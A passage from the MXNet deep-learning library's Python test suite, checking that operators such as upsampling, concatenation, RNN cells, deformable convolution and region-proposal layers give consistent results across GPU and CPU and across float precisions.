{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_disabled()
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
@assert_raises_cudnn_disabled()
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_disabled()
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 10, 10),
# 'deformable_conv_offset': (2, 18, 8, 8),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# Pad > 0
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 36, 5, 5),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
name='deformable_conv')
@with_seed()
@assert_raises_cudnn_disabled()
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@with_seed()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% gurantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
